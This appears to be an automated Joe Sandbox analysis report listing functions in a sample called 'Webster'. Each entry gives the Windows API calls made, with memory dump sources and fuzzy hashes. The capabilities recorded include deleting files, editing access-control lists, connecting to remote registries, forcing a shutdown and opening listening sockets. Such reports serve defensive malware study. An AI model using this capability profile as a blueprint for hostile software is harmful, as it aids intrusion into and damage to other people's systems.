                                                                                    • Part of subcall function 00AE4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AE4890
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00AEF7B1
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AEF7BC
                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00AEF7D8
                                                                                  • _wcscmp.LIBCMT ref: 00AEF7FF
                                                                                  • _wcscmp.LIBCMT ref: 00AEF816
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEF828
                                                                                  • SetCurrentDirectoryW.KERNEL32(00B3B578), ref: 00AEF846
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AEF850
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AEF85D
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AEF86F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1824444939-438819550
                                                                                  • Opcode ID: 938830d2de86aa94d26c41d3358c0904bc163287b0ce217d438118f98a4fcc12
                                                                                  • Instruction ID: 1d1e2cd1fdc405e9680cf9be35be3d0411c235c3c9c078cbb28b14674084f31b
                                                                                  • Opcode Fuzzy Hash: 938830d2de86aa94d26c41d3358c0904bc163287b0ce217d438118f98a4fcc12
                                                                                  • Instruction Fuzzy Hash: 0531927250025AAEDB10AFB6DC59AEE77ACDF09321F1041A5F904A31A0DB70DE858A60
                                                                                  Function 00AD88CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AD8E3C
                                                                                    • Part of subcall function 00AD8E20: GetLastError.KERNEL32(?,00AD8900,?,?,?), ref: 00AD8E46
                                                                                    • Part of subcall function 00AD8E20: GetProcessHeap.KERNEL32(00000008,?,?,00AD8900,?,?,?), ref: 00AD8E55
                                                                                    • Part of subcall function 00AD8E20: HeapAlloc.KERNEL32(00000000,?,00AD8900,?,?,?), ref: 00AD8E5C
                                                                                    • Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AD8E73
                                                                                    • Part of subcall function 00AD8EBD: GetProcessHeap.KERNEL32(00000008,00AD8916,00000000,00000000,?,00AD8916,?), ref: 00AD8EC9
                                                                                    • Part of subcall function 00AD8EBD: HeapAlloc.KERNEL32(00000000,?,00AD8916,?), ref: 00AD8ED0
                                                                                    • Part of subcall function 00AD8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AD8916,?), ref: 00AD8EE1
                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AD8931
                                                                                  • _memset.LIBCMT ref: 00AD8946
                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AD8965
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00AD8976
                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00AD89B3
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AD89CF
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00AD89EC
                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AD89FB
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00AD8A02
                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AD8A23
                                                                                  • CopySid.ADVAPI32(00000000), ref: 00AD8A2A
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AD8A5B
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AD8A81
                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AD8A95
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3996160137-0
                                                                                  • Opcode ID: 49c0694cd70fc63c43d7ae606d0a1bd1e05cf2b171b70c62e14e70b4723fb4cb
                                                                                  • Instruction ID: 2372a81eda0b28e439d7e74801b2922c0008dea72dbe742bff2e16c150dfe883
                                                                                  • Opcode Fuzzy Hash: 49c0694cd70fc63c43d7ae606d0a1bd1e05cf2b171b70c62e14e70b4723fb4cb
                                                                                  • Instruction Fuzzy Hash: 82612875910209BFDF00DFA5DC45AEEBB79FF04300F04812AF956A72A0DB799A55CB60
                                                                                  Function 00B00A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B00B0C
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B00BAB
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B00C43
                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B00E82
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B00E8F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1240663315-0
                                                                                  • Opcode ID: dbd46de602358cf2d8f662fb6c2603c503098b74e809e0cf19f2b200b4e246dd
                                                                                  • Instruction ID: 7e7a856659c8892f4cba781e5e0f6aada2f414666fe5f16b8cd0a4e066d67e81
                                                                                  • Opcode Fuzzy Hash: dbd46de602358cf2d8f662fb6c2603c503098b74e809e0cf19f2b200b4e246dd
                                                                                  • Instruction Fuzzy Hash: 8BE17F31614205AFCB14EF28C995E6ABBE5FF89714F0489ADF44ADB2A1DB30ED01CB51
                                                                                  Function 00AE443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __swprintf.LIBCMT ref: 00AE4451
                                                                                  • __swprintf.LIBCMT ref: 00AE445E
                                                                                    • Part of subcall function 00AA38C8: __woutput_l.LIBCMT ref: 00AA3921
                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00AE4488
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00AE4494
                                                                                  • LockResource.KERNEL32(00000000), ref: 00AE44A1
                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00AE44C1
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00AE44D3
                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00AE44E2
                                                                                  • LockResource.KERNEL32(?), ref: 00AE44EE
                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00AE454F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                  • String ID:
                                                                                  • API String ID: 1433390588-0
                                                                                  • Opcode ID: a24556327d73be4477278b4193869d4fbe4d96dc7ae94caf3ec69ed5a12f768e
                                                                                  • Instruction ID: 761d1cc266ef443a0f8968b0df8572d94229c193405c197b5a60da1e31650683
                                                                                  • Opcode Fuzzy Hash: a24556327d73be4477278b4193869d4fbe4d96dc7ae94caf3ec69ed5a12f768e
                                                                                  • Instruction Fuzzy Hash: F1318E7160125AABDB11AF61ED48ABF7BACFB09301F408425F912D7150DB74DE50CAB0
                                                                                  Function 00AF4830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1737998785-0
                                                                                  • Opcode ID: 9ce11b021aed973167225765d66e3c187d4791bb403ab847335e2a05e9c45345
                                                                                  • Instruction ID: 9a2f9202f1e4fd1cc3b6bc1d1b5b30341c34903aaceb58f99cbb3ac6f7ea3817
                                                                                  • Opcode Fuzzy Hash: 9ce11b021aed973167225765d66e3c187d4791bb403ab847335e2a05e9c45345
                                                                                  • Instruction Fuzzy Hash: 0E21A1312052159FDB01BF64ED49B6E77A8EF88721F008019FA069B2A1DFB0AD50CB94
                                                                                  Function 00AE3CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4
                                                                                    • Part of subcall function 00AE4FEC: GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00AE3D96
                                                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00AE3E3E
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00AE3E51
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00AE3E6E
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE3E90
                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00AE3EAC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 4002782344-1173974218
                                                                                  • Opcode ID: 2820d31bf6d182582c4186fe0210119c506c70d5d6e488688fecd6fb842ddf7a
                                                                                  • Instruction ID: a28d5492202e2e9f3c7797d07a58f4a66356aba9d15a2f9e6ca369363041c33b
                                                                                  • Opcode Fuzzy Hash: 2820d31bf6d182582c4186fe0210119c506c70d5d6e488688fecd6fb842ddf7a
                                                                                  • Instruction Fuzzy Hash: 0E516F3290118EAACF15FBA1CA969EDB7B9AF15300F604165E442B7192EF316F09CB60
                                                                                  Function 00AEFA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00AEFA83
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AEFB96
                                                                                    • Part of subcall function 00A852B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A852E6
                                                                                  • Sleep.KERNEL32(0000000A), ref: 00AEFAB3
                                                                                  • _wcscmp.LIBCMT ref: 00AEFAC7
                                                                                  • _wcscmp.LIBCMT ref: 00AEFAE2
                                                                                  • FindNextFileW.KERNEL32(?,?), ref: 00AEFB80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                                  • String ID: *.*
                                                                                  • API String ID: 2185952417-438819550
                                                                                  • Opcode ID: 404026fd22709555525fd043264d74c6c1dc47464f628504031e88d13b674193
                                                                                  • Instruction ID: 551ae5fe0c37e6d61b01301717388f15272f09623a767e4e8430fa692ee6025e
                                                                                  • Opcode Fuzzy Hash: 404026fd22709555525fd043264d74c6c1dc47464f628504031e88d13b674193
                                                                                  • Instruction Fuzzy Hash: 0341817194025AAFCF14DF65CD59AEEBBB8FF05350F548166F814A32A1EB309E84CB90
                                                                                  Function 00AE5778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AD9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AD93E3
                                                                                    • Part of subcall function 00AD9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AD9410
                                                                                    • Part of subcall function 00AD9399: GetLastError.KERNEL32 ref: 00AD941D
                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00AE57B4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                  • API String ID: 2234035333-194228
                                                                                  • Opcode ID: e721262ad05997935b8691677d104cd68df0dd9c3aa12ff0c8e4f795375d2182
                                                                                  • Instruction ID: e3152a27dd9a5abf8797c7b2302ad7412285eed8a2e443c51ae6b479b77e3375
                                                                                  • Opcode Fuzzy Hash: e721262ad05997935b8691677d104cd68df0dd9c3aa12ff0c8e4f795375d2182
                                                                                  • Instruction Fuzzy Hash: BF01F731E50756EAE7286377BC8ABBB7268AB05748F24082AF953D70D2DE505C608150
                                                                                  Function 00AF696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00AF69C7
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF69D6
                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00AF69F2
                                                                                  • listen.WSOCK32(00000000,00000005), ref: 00AF6A01
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF6A1B
                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00AF6A2F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                  • String ID:
                                                                                  • API String ID: 1279440585-0
                                                                                  • Opcode ID: c3e5313ecd021c791df899781dedd168576626e5260461eac3cfe54dc5697ca1
                                                                                  • Instruction ID: 11ff48fb67b9397f4254dacc3b628392fa9af721353e0d11add09defde0549cf
                                                                                  • Opcode Fuzzy Hash: c3e5313ecd021c791df899781dedd168576626e5260461eac3cfe54dc5697ca1
                                                                                  • Instruction Fuzzy Hash: B8219E306006059FCB10FFA8C989A7EB7B9EF48724F148659F956A73E1DB70AC41CB91
                                                                                  Function 00A81663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00A81DD6
                                                                                  • GetSysColor.USER32(0000000F), ref: 00A81E2A
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00A81E3D
                                                                                    • Part of subcall function 00A8166C: DefDlgProcW.USER32(?,00000020,?), ref: 00A816B4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ColorProc$LongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3744519093-0
                                                                                  • Opcode ID: 22b794f2e1eefbe508c1aa68618d2d0775d66d84d1597adc1d6fd11e355b86f9
                                                                                  • Instruction ID: 9a6ca7a4f13cab923abbe56785d79b75f8f97104a88b6e336fca80e322c46f42
                                                                                  • Opcode Fuzzy Hash: 22b794f2e1eefbe508c1aa68618d2d0775d66d84d1597adc1d6fd11e355b86f9
                                                                                  • Instruction Fuzzy Hash: ACA123B4125404BBE628BBA98C49FBF3EADEB46341F24460AF402D61D2DF659D03D376
                                                                                  Function 00AEC2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00AEC329
                                                                                  • _wcscmp.LIBCMT ref: 00AEC359
                                                                                  • _wcscmp.LIBCMT ref: 00AEC36E
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00AEC37F
                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00AEC3AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 2387731787-0
                                                                                  • Opcode ID: 4f4dfc4d2009b60670e5dcd834cf2343f4de23f6b3a5169f49f7764c47faff25
                                                                                  • Instruction ID: b3b13407ad4320c9cd50a7ad8277f858afd22e43ae8001c2875ecf6b146b41a9
                                                                                  • Opcode Fuzzy Hash: 4f4dfc4d2009b60670e5dcd834cf2343f4de23f6b3a5169f49f7764c47faff25
                                                                                  • Instruction Fuzzy Hash: E8519A756046029FC714EF69C591EAAB3E8FF49320F10861DF95A8B3A1DB30ED05CB91
                                                                                  Function 00AF6E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AF8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AF84A0
                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00AF6E89
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF6EB2
                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00AF6EEB
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF6EF8
                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00AF6F0C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                  • String ID:
                                                                                  • API String ID: 99427753-0
                                                                                  • Opcode ID: 3ca34e94f80d7f34fe6edfd3b67a20549c813f4ef1832b25cbc49a9bdad41e35
                                                                                  • Instruction ID: e830fbe02662b6b2b9a80afc3f8fa3223b542ebce2ecd5dbe5ff19fd629fb052
                                                                                  • Opcode Fuzzy Hash: 3ca34e94f80d7f34fe6edfd3b67a20549c813f4ef1832b25cbc49a9bdad41e35
                                                                                  • Instruction Fuzzy Hash: 1541D375600215AFDB10BFA4DD86F7E77A8DF48724F048558FA16AB3D2EA709D008BA1
                                                                                  Function 00B059B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                  • String ID:
                                                                                  • API String ID: 292994002-0
